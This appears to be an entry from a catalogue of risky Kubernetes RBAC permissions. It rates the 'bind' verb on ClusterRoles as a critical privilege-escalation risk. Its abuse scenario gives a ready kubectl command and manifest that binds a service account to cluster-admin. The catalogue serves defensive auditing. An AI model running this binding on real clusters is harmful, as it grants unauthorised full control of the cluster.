Bind ClusterRoles to identities (bind verb)
Elevation of Privilege
Critical
Overview
| Field | Value |
|---|---|
| ID | 1032 |
| Name | Bind ClusterRoles to identities (bind verb) |
| Risk Category | Elevation of Privilege |
| Risk Level | Critical |
| Role Type | ClusterRole |
| API Groups | rbac.authorization.k8s.io |
| Resources | clusterroles |
| Risky Verb Combinations | [bind] |
| Tags | BindingToPrivilegedRole ClusterAdminAccess PrivilegeEscalation RBACManipulation |
Description
Permits using the ‘bind’ verb on ClusterRoles (or Roles). This allows a user to create a ClusterRoleBinding (or RoleBinding) that grants the permissions of a specific role to another user, group, or service account, potentially leading to privilege escalation if a highly privileged role is bound.
Abuse Scenarios
- Create a ClusterRoleBinding to grant ‘cluster-admin’ to a service account, leveraging the ‘bind’ permission on the ‘cluster-admin’ ClusterRole.
# This command will succeed if the user has 'bind' on the 'cluster-admin' ClusterRole.
kubectl create -f - <<EOF
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: bind-to-cluster-admin
subjects:
- kind: ServiceAccount
name: <serviceaccount-name>
namespace: <namespace>
roleRef:
kind: ClusterRole
name: cluster-admin
apiGroup: rbac.authorization.k8s.io
EOF
# Example: kubectl create -f - <<EOF ... EOF (bind 'default' SA in 'default' namespace to cluster-admin)